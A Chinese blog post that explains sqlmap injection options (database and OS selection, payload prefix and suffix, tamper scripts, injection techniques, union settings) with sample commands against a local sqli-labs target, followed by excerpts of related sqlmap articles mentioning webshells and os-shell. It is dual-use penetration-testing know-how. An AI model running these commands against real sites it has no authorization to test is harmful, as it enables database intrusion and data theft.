注入工具 -- sqlmap(注入参数)

最新推荐文章于 2024-05-06 18:59:53 发布
最新推荐文章于 2024-05-06 18:59:53 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: web安全工具库 文章标签: 注入工具 sqlmap 注入参数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103726653
版权
任何关系走到最后,不过相识一场,有心者有所累,无心者无所谓,情出自愿,事过无悔,不负遇见,不谈亏欠。。。

一、指定数据库类型 --dbms

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs

二、指定操作系统 --os

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs

三、解决编码问题

将所有结果转换为字符串,并用空格替换NULL结果 --no-cast

四、关闭字符串转义机制

–no-escape

五、设置无效值替换

–invalid-bignum 大整数替换
–invalid-logical 布尔操作替换
–invalid-string 随机字符串替换

六、自定义注入负载位置

–prefix 设置前缀
–suffix 设置后缀
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --prefix="’)" --suffix=“and (‘abc’='abc” --dbs
payload:id=(‘1’) and (‘abc’=‘abc’)

七、设置tamper脚本

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --tamper “least.py,varnish.py” --dbs

八、设置dbms认证

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbms-cred=“root:root” --dbs

九、设置具体sql注入技术

–technique B 布尔盲注
–technique E 报错注入
–technique U union查询注入
–technique S 堆叠注入
–technique T 时间盲注
–technique Q 内联查询注入
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --technique T --time-sec 3 --dbs
–time -sec 时间盲注时间为3

十、指定union字段数

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-cols 12-18 --dbs

十一、指定union字符,默认是null

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-char aaa --dbs
禁止非法,后果自负
欢迎关注公众号:web安全工具库

在这里插入图片描述

web安全工具库
关注
专栏目录
sqlmap 注入参数
白菜执笔人的博客
02-26 2607
Web安全攻防 学习笔记 一、Sqlmap 强制设置 1.1、Sqlmap 强制设置 DBMS 默认情况下 sqlmap 会自动识别探测目标 web 应用程序的后端数据库管理系统(DBMS),sqlmap 支持 的 DBMS 种类。 MySQL Oracle PostgreSQL Microsoft SQL Server Microsoft Access Firebi...
sqlmap学习(九)注入参数
rane的博客
03-27 325
1、sqlmap强制设置DBMS 默认情况下sqlmap会自动探测目标web应用程序后台数据库管理系统 --dbms 数据库管理系统名称 [版本号] python sqlmap.py -u "http://172.17.0.1/Less-1/?id=1" --banner --dbms mysql 2、sqlmap强制设置OS python sqlmap.py -u "http://172.17...
sqlmap报错注入
weixin_44110913的博客
04-07 3732
0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成。 所有的注入原理都是一样,即用户输入被拼接执行。但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入。 0x01概念 报错型注入的利用大概有以下3种方式: 复制代码 1:?id=2’ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (...
Sqlmap注入的命令参数
weixin_42127015的博客
09-26 375
1、判断注入点:sqlmap.py -u url(目标地址) -u:指定地址 2、爆破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs --dbs:查看所有数据库名 --current-db:查看当前使用的数据库 3、爆破数据表名:sqlmap.py -u http://xxx.com/?id=1 -D 库名 --tables --D:指定数据库名 --tables:查看指定库下面的所有的...
Sqlmap注入工具的使用及相关参数介绍
single_g_l的博客
01-06 1万+
目录 1. sqlmap 判断是否存在注入漏洞,参数介绍 2. 获取数据库信息 3. 读文件,写webshell 1. sqlmap 判断是否存在注入漏洞,参数介绍 2. 获取数据库信息 3. 读文件,写webshell
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 2787
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
sqlmap 指定 数据库类型_注入工具 -- sqlmap(注入参数)
weixin_34013170的博客
01-03 6754
任何关系走到最后,不过相识一场,有心者有所累,无心者无所谓,情出自愿,事过无悔,不负遇见,不谈亏欠。。。一、指定数据库类型 --dbmshttp://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs二、指定操作系统 --oshttp://192.168.1.121/sqli/Less-1/?id=1&&a...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3094
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
红队专题-渗透工具-sqlmap
热门推荐
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4)联合查询注入,可以使用union的情况下的注入。 5)堆查询注入,可以同时执行多条语句的执行时的注入。 比较实用的sql注入工具
【网络安全 | 渗透工具SQLmap加密注入教程+实战详析
等风来
08-02 6144
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
最新发布
2401_84253089的博客
05-06 865
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Sqlmap注入技术参数
一米八多的瑞兹的博客
03-18 260
1. Sqlmap设置union查询表 某些情况下,Sqlmap需要设定Union 查询SQL注入的具体数据表才可以得到数据。 –union-from 表名 2. Sqlmap设置DNS露出攻击 针对目标网络很有可能对外部流量进行限制,或者设置WAF。 通过设置DNS流量来突破限制 --dns-domain “dns服务器” 需要用户自身具有一个开放53端口的DNS服务器,通过DNS流量来获得Web应用程序中数据内容。 3. Sqlmap设置二次注入 Sqlmap中可以设置二次注入的结果页面。 –
SQL注入总结 附带sqlmap使用参数
weixin_52206305的博客
03-07 1126
SQL注入漏洞(SQLinjection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一。在2005年前后,SQL注入漏洞到处可见,在用户登录或者搜索时,只需要输入一个单引号就可以检测出这种漏洞。随着Web应用程序的安全性不断提高,SQL注入漏洞逐渐减少,同时也变得更加难以检测与利用。
sqlmap之sql注入(一)
m0_55313512的博客
02-27 5684
SQL注入(一)
SQLmap之sql注入(一)
qq_58000413的博客
08-13 962
-level >= 3 时sqlmap会尝试对User-Angent、referer进行注入。h、风险等级,共4个等级,当为2时会增加基于事件的测试语句,3会增加or语句的sql注入参数 -risk。c、sqlmap扫描等级(1-5):--level >= 2 时sqlmap会尝试注入cookie参数SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101 - 博客园。二、使用--os-shell之后会生成两个文件。一、执行--os-shell的系统操作的要求。......
sqlmap注入用法
w786572258的专栏
12-30 3478
下载git clone git://github.com/sqlmapproject/sqlmap.git用法检查注入sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11列数据库信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs指定库名列出所有表sqlmap -
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值